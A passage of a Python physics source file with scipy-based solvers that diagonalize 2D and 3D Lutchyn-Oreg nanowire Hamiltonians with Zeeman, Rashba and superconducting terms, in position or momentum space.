added to H before diagonalizing it. The elements of the dictionary...
space: {"position","momentum","position2momentum"}
Space in which the Hamiltonian is built. "position" means
real-space (r-space). In this case the boundary conditions are open.
On the other hand, "momentum" means reciprocal space (k-space). In
this case the built Hamiltonian corresponds to the Hamiltonian of
the unit cell, with periodic boundary conditions along the
x-direction. "position2momentum" means that the Hamiltonian is
built in real space, but you want to diagonalize it in momentum
space (so in each step is converted to a momentum space).This
option is recommended for large matrices.
k_vec: arr
If space=='momentum' or "position2momentum", k_vec is the
(discretized) momentum vector, usually in the First Brillouin Zone.
sparse: {"yes","no"}
Sparsety of the built Hamiltonian. "yes" builds a dok_sparse matrix,
while "no" builds a dense matrix.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
near: float
If sparse=="yes" and BdG=='no', near provides the value around to
which the eigenvalues must be found.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
Rashba={"Full-Rashba","kx-terms"}
Whether include all the terms of the Rashba coupling (Full-Rashba)
or include only those terms proportional to kx (kx-terms).
Returns
-------
E: arr (n_eig x n)
Eigevalues (energies), ordered from smaller to larger.
U: arr ((2 x N) x n_eig x n)
Eigenvectors of the system with the same ordering.
"""
#Obtain the dimensions:
Ny, Nz = N[0], N[1]
if np.ndim(dis)==0:
dis_y, dis_z = dis, dis
else:
dis_y, dis_z = dis[0], dis[1]
m = int(2 * Ny * Nz)
if (np.isscalar(section) and not(section=='rectangular')) or not(np.isscalar(section)):
m_hex=H_rec2shape(0,section,N,dis,BdG='no',output='m')
if (space=='momentum'):
n_k=len(k_vec)
if sparse=='no':
n_eig=m
#Make sure that the onsite parameters are arrays:
if space=='momentum':
if np.isscalar(m_eff):
m_eff = m_eff * np.ones((Ny,Nz))
m_eff=m_eff.flatten()
if np.isscalar(mu) and not(mu==0):
mu = mu * np.ones((Ny,Nz))
if np.isscalar(B) and not(B==0):
Bx=B
By=0
Bz=0
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
elif np.ndim(B)==1:
Bx=B[0]
By=B[1]
Bz=B[2]
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
if np.ndim(aR)==0:
aRx=np.zeros(N)
aRy=np.zeros(N)
aRz=aR*np.ones(N)
elif np.ndim(aR)==1:
if len(aR)==3:
aRx=aR[0]*np.ones(N)
aRy=aR[1]*np.ones(N)
aRz=aR[2]*np.ones(N)
else:
aRx=np.zeros(N)
aRy=np.zeros(N)
aRz=aR*np.ones(N)
else:
aRx=aR[0]
aRy=aR[1]
aRz=aR[2]
#Store matrices:
if space=='position':
E = np.empty([int(n_eig)])
U = np.empty([m,int(n_eig)],dtype=complex)
elif space=='momentum':
E = np.empty([int(n_eig),n_k])
U = np.empty([m,int(n_eig),n_k],dtype=complex)
if sparse=='no':
H_add=np.zeros((m,m),dtype=complex)
else:
if not(scipy.sparse.issparse(H)):
H = scipy.sparse.dok_matrix(H,dtype=complex)
H_add=scipy.sparse.dok_matrix((m,m),dtype=complex)
#Obtain the add-values Hamiltonian:
if not(np.isscalar(mu)):
e=-mu
e=e.flatten()
H_add[diagonal(m)] = np.repeat(e,2)
if not(np.isscalar(B) and B==0):
Bx,By,Bz=Bx.flatten(),By.flatten(),Bz.flatten()
Bz=np.repeat(Bz,2)
Bz[1::2] = -Bz[::2]
H_add[diagonal(m,k=1,step=2)], H_add[diagonal(m,k=-1,step=2)] = Bx-1j*By, Bx+1j*By
H_add[diagonal(m)] += Bz
if not((aRx==0).all() and (aRy==0).all() and (aRz==0).all()):
aRx_ky, aRz_ky = np.repeat(((aRx[1::,:]+aRx[:-1,:])/(4*dis_y)).flatten(),2), ((aRz[1::,:]+aRz[:-1,:])/(4*dis_y)).flatten()
aRx_kz, aRy_kz = ((aRx[:,1::]+aRx[:,:-1])/(4*dis_z)).flatten(), ((aRy[:,1::]+aRy[:,:-1])/(4*dis_z)).flatten()
aRx_ky[1::2] = -aRx_ky[::2]
H_add[diagonal(m,k=2*Nz)] = 1j*aRx_ky
H_add[diagonal(m,k=-2*Nz)] = -1j*aRx_ky
H_add[diagonal(m,k=2*Nz-1,step=2,init=1)] += -1j*aRz_ky
H_add[diagonal(m,k=-2*Nz+1,step=2,init=1)] += 1j*aRz_ky
H_add[diagonal(m,k=1+2*Nz,step=2)] += -1j*aRz_ky
H_add[diagonal(m,k=-1-2*Nz,step=2)] += 1j*aRz_ky
aRx_kz, aRy_kz = np.insert(aRx_kz,np.arange((Nz-1),(Nz-1)*Ny,(Nz-1)),np.zeros((Ny-1))), np.insert(aRy_kz,np.arange((Nz-1),(Nz-1)*Ny,(Nz-1)),np.zeros((Ny-1)))
H_add[diagonal(m,k=1,step=2,init=1)] += aRx_kz+1j*aRy_kz
H_add[diagonal(m,k=-1,step=2,init=1)] += aRx_kz-1j*aRy_kz
H_add[diagonal(m,k=3,step=2)] += -aRx_kz+1j*aRy_kz
H_add[diagonal(m,k=-3,step=2)] += -aRx_kz-1j*aRy_kz
#Diagonalize the Hamiltonian:
if sparse=='no':
if space=='position':
if np.isscalar(section) and section=='rectangular':
E, U = scipy.linalg.eigh(H+H_add, lower=False)
E,U=order_eig(E,U,sparse='no',BdG='no')
else:
H=H_rec2shape(H+H_add,section,N,dis,BdG='no',output='H',m=m_hex)
E, U_hex = scipy.linalg.eigh(H, lower=False)
E,U_hex=order_eig(E,U_hex,sparse='no',BdG='no')
U=U_shape2rec(U_hex,section,N,dis,BdG='no')
elif space=='momentum':
aRy, aRz = aRy.flatten(), aRz.flatten()
aRy=np.repeat(aRy,2)
aRy[1::2] = -aRy[::2]
for i in range(n_k):
H_add[diagonal(m)] += np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
H_add[diagonal(m)] += -1*aRy*k_vec[i]
H_add[diagonal(m,k=1,step=2)] += -1j*aRz*k_vec[i]
H_add[diagonal(m,k=-1,step=2)] += 1j*aRz*k_vec[i]
if np.isscalar(section) and section=='rectangular':
E[:,i],U[:,:,i] = scipy.linalg.eigh(H+H_add, lower=False)
E[:,i],U[:,:,i]=order_eig(E[:,i],U[:,:,i],sparse='no',BdG='no')
else:
H_k=H_rec2shape(H+H_add,section,N,dis,BdG='no',output='H',m=m_hex)
E[:,i], U_hex = scipy.linalg.eigsh(H_k, lower=False)
E[:,i],U_hex=order_eig(E[:,i],U_hex,sparse='no',BdG='no')
U[:,:,i]=U_shape2rec(U_hex,section,N,dis,BdG='no')
H_add[diagonal(m)] -= np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
H_add[diagonal(m)] -= -1*aRy*k_vec[i]
H_add[diagonal(m,k=1,step=2)] -= -1j*aRz*k_vec[i]
H_add[diagonal(m,k=-1,step=2)] -= 1j*aRz*k_vec[i]
else:
if space=='position':
if np.isscalar(section) and section=='rectangular':
if not(near==None):
E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig, which='LA',sigma=near,tol=1e-9)
else:
E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig, which='SA',tol=1e-9)
E,U=order_eig(E,U,sparse='yes',BdG='no')
else:
H=H_rec2shape(H+H_add,section,N,dis,BdG='no',output='H',m=m_hex)
if not(near==None):
E, U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H),k = n_eig, which='LA',sigma=near,tol=1e-9)
else:
E, U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H),k = n_eig, which='SA',tol=1e-9)
E,U_hex=order_eig(E,U_hex,sparse='yes',BdG='no')
U=U_shape2rec(U_hex,section,N,dis,BdG='no')
elif space=='momentum':
H_k= scipy.sparse.dok_matrix((m,m),dtype=complex)
aRy, aRz = aRy.flatten(), aRz.flatten()
aRy=np.repeat(aRy,2)
aRy[1::2] = -aRy[::2]
for i in range(n_k):
print(i)
H_k = (H+H_add).copy()
H_k[diagonal(m)] += np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
H_k[diagonal(m)] += -1*aRy*k_vec[i]
H_k[diagonal(m,k=1,step=2)] += -1j*aRz*k_vec[i]
H_k[diagonal(m,k=-1,step=2)] += 1j*aRz*k_vec[i]
if np.isscalar(section) and section=='rectangular':
E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='SA',tol=1e-5)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='yes',BdG='no')
else:
H_k=H_rec2shape(H_k,section,N,dis,BdG='no',output='H',m=m_hex)
if not(near==None):
E[:,i], U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='LA',sigma=near,tol=1e-4)
else:
E[:,i], U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='SA',tol=1e-4)
E[:,i],U_hex=order_eig(E[:,i],U_hex,sparse='yes',BdG='no')
U[:,:,i]=U_shape2rec(U_hex,section,N,dis,BdG='no')
return (E), (U)
#%%
def LO_3D_solver(H,N,dis,
mu=0,B=0,aR=0,d=0,
space='position',k_vec=0,
sparse='yes',n_eig=None,near=None,
section='rectangular'):
"""
3D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 3D Lutchy-Oreg chain with superconductivity.
Parameters
----------
H: arr
Discretized 3D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
N: arr
Number of sites in each direction.
dis: int or int
Distance (in nm) between sites.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 3D array, it is the
on-site chemical potential.
B: float or arr
Zeeman splitting.
-If B is a float, the same constant B is added in the x direction
in each site and in every diagonalization step.
-If B is a 1D array of length=3, each element of the array is the
(constant) Zeeman splitting in each direction, which is added in
every diagonalization step.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 3D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
d: float or arr
On-site superconductivity. If it is float, the SC pairign amplitude
is the same in every site, while if it is a 3D array, it is the
on-site superconductivity.
dic: numpy array
Whether to re-use the dictionary of sites of other process or not.
space: {"position","momentum","position2momentum"}
Space in which the Hamiltonian is built. "position" means
real-space (r-space). In this case the boundary conditions are open.
On the other hand, "momentum" means reciprocal space (k-space). In
this case the built Hamiltonian corresponds to the Hamiltonian of
the unit cell, with periodic boundary conditions along the
x-direction. "position2momentum" means that the Hamiltonian is
built in real space, but you want to diagonalize it in momentum
space (so in each step is converted to a momentum space).This
option is recommended for large matrices.
k_vec: arr
If space=='momentum' or "position2momentum", k_vec is the
(discretized) momentum vector, usually in the First Brillouin Zone.
sparse: {"yes","no"}
Sparsety of the built Hamiltonian. "yes" builds a dok_sparse matrix,
while "no" builds a dense matrix.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
near: float
If sparse=="yes" and BdG=='no', near provides the value around to
which the eigenvalues must be found.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
Rashba={"Full-Rashba","kx-terms"}
Whether include all the terms of the Rashba coupling (Full-Rashba)
or include only those terms proportional to kx (kx-terms).
Returns
-------
E: arr (n_eig x n)
Eigevalues (energies), ordered from smaller to larger.
U: arr ((2 x N) x n_eig x n)
Eigenvectors of the system with the same ordering.
"""
#Obtain dimensions:
Nx, Ny, Nz = N[0], N[1], N[2]
if np.ndim(dis)==0:
dis_x, dis_y, dis_z = dis, dis, dis
else:
dis_x, dis_y, dis_z = dis[0], dis[1], dis[2]
m = int(4 * Nx * Ny * Nz)
if (np.isscalar(section) and not(section=='rectangular')) or not(np.isscalar(section)):
m_hex=H_rec2shape(0,section,N,dis,BdG='yes',output='m')
if (space=='momentum'):
n_k=len(k_vec)
if sparse=='no':
n_eig=m
#Make sure that the onsite parameters are arrays:
if np.isscalar(mu) and not(mu==0):
mu = mu * np.ones((Nx,Ny,Nz))
if np.isscalar(B) and not(B==0):
Bx=B
By=0
Bz=0
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
elif np.ndim(B)==1 and len(B)==3:
Bx=B[0]
By=B[1]
Bz=B[2]
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
if np.ndim(aR)==0:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
elif np.ndim(aR)==1:
if len(aR)==3:
aRx=aR[0]*np.ones((Nx,Ny,Nz))
aRy=aR[1]*np.ones((Nx,Ny,Nz))
aRz=aR[2]*np.ones((Nx,Ny,Nz))
else:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
else:
aRx=aR[0]
aRy=aR[1]
aRz=aR[2]
if np.isscalar(d) and not(d==0):
d = d * np.ones((Nx,Ny,Nz))
#Store matrices:
if space=='position':
E = np.empty([int(n_eig)])
U = np.empty([m,int(n_eig)],dtype=complex)
elif space=='momentum':
E = np.empty([int(n_eig),n_k])
U = np.empty([m,int(n_eig),n_k],dtype=complex)
if sparse=='no':
H_add=np.zeros((m,m),dtype=complex)
else:
if not(scipy.sparse.issparse(H)):
H = scipy.sparse.dok_matrix(H,dtype=complex)
H_add=scipy.sparse.dok_matrix((m,m),dtype=complex)
#Build the Hamiltonian:
if not(np.isscalar(mu)):
e=-mu
e=e.flatten()
for i in range(2):
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i)] = (-1)**(i)*np.repeat(e,2)
if not(np.isscalar(B) and B==0):
Bx,By,Bz=Bx.flatten(),By.flatten(),Bz.flatten()
Bz=np.repeat(Bz,2)
Bz[1::2] = -Bz[::2]
for i in range(2):
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=1,step=2)], H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-1,step=2)] = (-1)**(i)*Bx-1j*By, (-1)**(i)*Bx+1j*By
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i)] = (-1)**(i)*Bz
if not((aRy==0).all() and (aRz==0).all()):
aRy_kx, aRz_kx = np.repeat(((aRy[1::,:,:]+aRy[:-1,:,:])/(4*dis_x)).flatten(),2), ((aRz[1::,:,:]+aRz[:-1,:,:])/(4*dis_x)).flatten()
aRx_ky, aRz_ky = np.repeat(((aRx[:,1::,:]+aRx[:,:-1,:])/(4*dis_y)).flatten(),2), ((aRz[:,1::,:]+aRz[:,:-1,:])/(4*dis_y)).flatten()
aRx_kz, aRy_kz = ((aRx[:,:,1::]+aRx[:,:,:-1])/(4*dis_z)).flatten(), ((aRy[:,:,1::]+aRy[:,:,:-1])/(4*dis_z)).flatten()
aRy_kx[1::2], aRx_ky[1::2] = -aRy_kx[::2], -aRx_ky[::2]
aRx_ky, aRz_ky = np.insert(aRx_ky,np.repeat(np.arange(2*(Nz*Ny-Nz),2*(Ny*Nz-Nz)*Nx,2*(Ny*Nz-Nz)),2*Nz),np.zeros(2*Nz*(Nx-1))),np.insert(aRz_ky,np.repeat(np.arange((Nz*Ny-Nz),(Ny*Nz-Nz)*Nx,(Ny*Nz-Nz)),Nz),np.zeros(Nz*(Nx-1)))
aRx_kz, aRy_kz = np.insert(aRx_kz,np.arange((Nz-1),(Nz-1)*Ny*Nx,(Nz-1)),np.zeros(Nx*(Ny-1)+(Nx-1))), np.insert(aRy_kz,np.arange((Nz-1),(Nz-1)*Ny*Nx,(Nz-1)),np.zeros(Nx*(Ny-1)+(Nx-1)))
for i in range(2):
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=2*Ny*Nz)] = -1j*aRy_kx
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-2*Ny*Nz)] = +1j*aRy_kx
H_add[diagonal(int(m/2)*(i+1),k=2*Ny*Nz-1,step=2,init=1+int(m/2)*i)] += -1*(-1)**(i)*aRz_kx
H_add[diagonal(int(m/2)*(i+1),k=-2*Ny*Nz+1,step=2,init=1+int(m/2)*i)] += -1*(-1)**(i)*aRz_kx
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=1+2*Ny*Nz,step=2)] += (-1)**(i)*aRz_kx
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-1-2*Ny*Nz,step=2)] += (-1)**(i)*aRz_kx
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=2*Nz)] = +1j*aRx_ky
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-2*Nz)] = -1j*aRx_ky
H_add[diagonal(int(m/2)*(i+1),k=2*Nz-1,step=2,init=1+int(m/2)*i)] += -1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),k=-2*Nz+1,step=2,init=1+int(m/2)*i)] += 1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=1+2*Nz,step=2)] += -1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-1-2*Nz,step=2)] += 1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),k=1,step=2,init=1+int(m/2)*i)] += (-1)**(i)*aRx_kz+1j*aRy_kz
H_add[diagonal(int(m/2)*(i+1),k=-1,step=2,init=1+int(m/2)*i)] += (-1)**(i)*aRx_kz-1j*aRy_kz
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=3,step=2)] += -1*(-1)**(i)*aRx_kz+1j*aRy_kz
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-3,step=2)] += -1*(-1)**(i)*aRx_kz-1j*aRy_kz
if not(np.isscalar(d)):
d=d.flatten()
H_add[diagonal(m,k=int(m/2)+1,step=2)], H_add[diagonal(m,k=-int(m/2)-1,step=2)] = -np.conj(d), -d
H_add[diagonal(m,k=int(m/2)-1,step=2,init=1)], H_add[diagonal(m,k=-int(m/2)+1,step=2,init=1)] = np.conj(d), d
#Diagonalize the Hamiltonian:
if sparse=='no':
######### revisar
if space=='position':
E[0:int(m/2)], U[0:m, 0:int(m/2)] = scipy.linalg.eigh(H+H_add, lower=False,eigvals=(2*N,4*N-1))
E[int(m/2):m]=-E[0:int(m/2)]
U[0:int(m/2), int(m/2):m] = U[int(m/2):m, 0:int(m/2)]
U[int(m/2):m, int(m/2):m] = U[0:int(m/2), 0:int(m/2)]
E,U=order_eig(E,U,sparse='no')
elif space=='momentum':
for i in range(n_k):
for j in range(2):
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=m-2*Ny*Nz)] = (-1j*aRy_kx)*np.exp(-1j*k_vec[i]*Nx*(-1)**(i))
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-m+2*Ny*Nz)] = (+1j*aRy_kx)*np.exp(1j*k_vec[i]*Nx*(-1)**(i))
H_add[diagonal(int(m/2)*(j+1),k=m-2*Ny*Nz-1,step=2,init=1+int(m/2)*j)] = (-1)**(i)*(-aRz_kx)*np.exp(-1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_add[diagonal(int(m/2)*(j+1),k=-m+2*Ny*Nz+1,step=2,init=1+int(m/2)*j)] = (-1)**(i)*(-aRz_kx)*np.exp(1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=m+1-2*Ny*Nz,step=2)] = (-1)**(i)*(aRz_kx)*np.exp(-1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-m-1+2*Ny*Nz,step=2)] = (-1)**(i)*(aRz_kx)*np.exp(1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
E[0:int(m/2),i], U[0:m, 0:int(m/2),i] = scipy.linalg.eigh(H[:,:,i]+H_add, lower=False,eigvals=(2*N,4*N-1))
E[int(m/2):m,i]=-E[0:int(m/2),i]
U[0:int(m/2), int(m/2):m,i] = U[int(m/2):m, 0:int(m/2),i]
U[int(m/2):m, int(m/2):m,i] = U[0:int(m/2), 0:int(m/2),i]
E[:,i],U[:,:,i]=order_eig(E[:,i],U[:,:,i],sparse='no')
#########
else:
if space=='position':
if np.isscalar(section) and section=='rectangular':
E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig,sigma=0, which='LM',tol=1e-4)
E, U=order_eig(E, U,sparse='yes')
else:
H=H_rec2shape(H+H_add,section,N,dis,BdG='yes',output='H',m=m_hex)
E, U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H),k = n_eig,sigma=0, which='LM',tol=1e-4)
E, U_hex=order_eig(E, U_hex,sparse='yes')
U=U_shape2rec(U_hex,section,N,dis,BdG='yes')
elif space=='momentum':
H_k= scipy.sparse.dok_matrix((m,m),dtype=complex)
for i in range(n_k):
H_k = (H+H_add).copy()
for j in range(2):
if not((aRy==0).all()):
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=m-2*Ny*Nz)] = (-1j*aRy_kx)*np.exp(-1j*k_vec[i]*Nx*(-1)**(i))
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-m+2*Ny*Nz)] = (+1j*aRy_kx)*np.exp(1j*k_vec[i]*Nx*(-1)**(i))
if not((aRz==0).all()):
H_k[diagonal(int(m/2)*(j+1),k=m-2*Ny*Nz-1,step=2,init=1+int(m/2)*j)] = (-1)**(i)*(-aRz_kx)*np.exp(-1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_k[diagonal(int(m/2)*(j+1),k=-m+2*Ny*Nz+1,step=2,init=1+int(m/2)*j)] = (-1)**(i)*(-aRz_kx)*np.exp(1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=m+1-2*Ny*Nz,step=2)] = (-1)**(i)*(aRz_kx)*np.exp(-1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-m-1+2*Ny*Nz,step=2)] = (-1)**(i)*(aRz_kx)*np.exp(1j*(-1)**(i)*k_vec[i]*Nx*(-1)**(i))
if np.isscalar(section) and section=='rectangular':
E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig,sigma=0, which='LM',tol=1e-5)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='yes')
else:
H_k=H_rec2shape(H_k,section,N,dis,BdG='yes',output='H',m=m_hex)
E[:,i], U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig,sigma=0, which='LM',tol=1e-5)
E[:,i], U_hex =order_eig(E[:,i], U_hex,sparse='yes')
U[:,:,i]=U_shape2rec(U_hex,section,N,dis,BdG='yes')
return (E), (U)
#%%
def LO_3D_solver_NoSC(H,N,dis,
mu=0,B=0,aR=0,
space='position',k_vec=0,
sparse='yes',n_eig=None,near=None,
section='rectangular'):
"""
3D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 3D Lutchy-Oreg chain withot superconductivity.
Parameters
----------
H: arr
Discretized 3D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
N: arr
Number of sites in each direction.
dis: int or int
Distance (in nm) between sites.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 3D array, it is the
on-site chemical potential.
B: float or arr
Zeeman splitting.
-If B is a float, the same constant B is added in the x direction
in each site and in every diagonalization step.
-If B is a 1D array of length=3, each element of the array is the
(constant) Zeeman splitting in each direction, which is added in
every diagonalization step.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 3D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
dic: numpy array
Whether to re-use the dictionary of sites of other process or not.
space: {"position","momentum","position2momentum"}
Space in which the Hamiltonian is built. "position" means
real-space (r-space). In this case the boundary conditions are open.
On the other hand, "momentum" means reciprocal space (k-space). In
this case the built Hamiltonian corresponds to the Hamiltonian of
the unit cell, with periodic boundary conditions along the
x-direction. "position2momentum" means that the Hamiltonian is
built in real space, but you want to diagonalize it in momentum
space (so in each step is converted to a momentum space).This
option is recommended for large matrices.
k_vec: arr
If space=='momentum' or "position2momentum", k_vec is the
(discretized) momentum vector, usually in the First Brillouin Zone.
sparse: {"yes","no"}
Sparsety of the built Hamiltonian. "yes" builds a dok_sparse matrix,
while "no" builds a dense matrix.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
near: float
If sparse=="yes" and BdG=='no', near provides the value around to
which the eigenvalues must be found.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
Rashba={"Full-Rashba","kx-terms"}
Whether include all the terms of the Rashba coupling (Full-Rashba)
or include only those terms proportional to kx (kx-terms).
Returns
-------
E: arr (n_eig x n)
Eigevalues (energies), ordered from smaller to larger.
U: arr ((2 x N) x n_eig x n)
Eigenvectors of the system with the same ordering.
"""
#Obtain dimensions:
Nx, Ny, Nz = N[0], N[1], N[2]
if np.ndim(dis)==0:
dis_x, dis_y, dis_z = dis, dis, dis
else:
dis_x, dis_y, dis_z = dis[0], dis[1], dis[2]
m = int(2 * Nx * Ny * Nz)
if (np.isscalar(section) and not(section=='rectangular')) or not(np.isscalar(section)):
m_hex=H_rec2shape(0,section,N,dis,BdG='no',output='m')
if (space=='momentum'):
n_k=len(k_vec)
if sparse=='no':
n_eig=m
#Make sure that the onsite parameters are arrays:
if np.isscalar(mu) and not(mu==0):
mu = mu * np.ones((Nx,Ny,Nz))
if np.isscalar(B) and not(B==0):
Bx=B
By=0
Bz=0
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
elif np.ndim(B)==1 and len(B)==3:
Bx=B[0]
By=B[1]
Bz=B[2]
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
if np.ndim(aR)==0:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
elif np.ndim(aR)==1:
if len(aR)==3:
aRx=aR[0]*np.ones((Nx,Ny,Nz))
aRy=aR[1]*np.ones((Nx,Ny,Nz))
aRz=aR[2]*np.ones((Nx,Ny,Nz))
else:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
else:
aRx=aR[0]
aRy=aR[1]
aRz=aR[2]
#Store matrices:
if space=='position':
E = np.empty([int(n_eig)])
U = np.empty([m,int(n_eig)],dtype=complex)
elif space=='momentum':
E = np.empty([int(n_eig),n_k])
U = np.empty([m,int(n_eig),n_k],dtype=complex)
if sparse=='no':
H_add=np.zeros((m,m),dtype=complex)
else:
if not(scipy.sparse.issparse(H)):
H = scipy.sparse.dok_matrix(H,dtype=complex)
H_add=scipy.sparse.dok_matrix((m,m),dtype=complex)
#Build the Hamiltonian:
if not(np.isscalar(mu)):
e=-mu
e=e.flatten()
H_add[diagonal(m)] = np.repeat(e,2)
if not(np.isscalar(B) and B==0):
Bx,By,Bz=Bx.flatten(),By.flatten(),Bz.flatten()
Bz=np.repeat(Bz,2)
Bz[1::2] = -Bz[::2]
H_add[diagonal(m,k=1,step=2)], H_add[diagonal(m,k=-1,step=2)] = Bx-1j*By, Bx+1j*By
H_add[diagonal(m)] = + Bz
if not((aRx==0).all() and (aRy==0).all() and (aRz==0).all()):
aRy_kx, aRz_kx = np.repeat(((aRy[1::,:,:]+aRy[:-1,:,:])/(4*dis_x)).flatten(),2), ((aRz[1::,:,:]+aRz[:-1,:,:])/(4*dis_x)).flatten()
aRx_ky, aRz_ky = np.repeat(((aRx[:,1::,:]+aRx[:,:-1,:])/(4*dis_y)).flatten(),2), ((aRz[:,1::,:]+aRz[:,:-1,:])/(4*dis_y)).flatten()
aRx_kz, aRy_kz = ((aRx[:,:,1::]+aRx[:,:,:-1])/(4*dis_z)).flatten(), ((aRy[:,:,1::]+aRy[:,:,:-1])/(4*dis_z)).flatten()
aRy_kx[1::2], aRx_ky[1::2] = -aRy_kx[::2], -aRx_ky[::2]
H_add[diagonal(m,k=2*Ny*Nz)] = -1j*aRy_kx
H_add[diagonal(m,k=-2*Ny*Nz)] = +1j*aRy_kx
H_add[diagonal(m,k=2*Ny*Nz-1,step=2,init=1)] += -aRz_kx
H_add[diagonal(m,k=-2*Ny*Nz+1,step=2,init=1)] += -aRz_kx
H_add[diagonal(m,k=1+2*Ny*Nz,step=2)] += aRz_kx
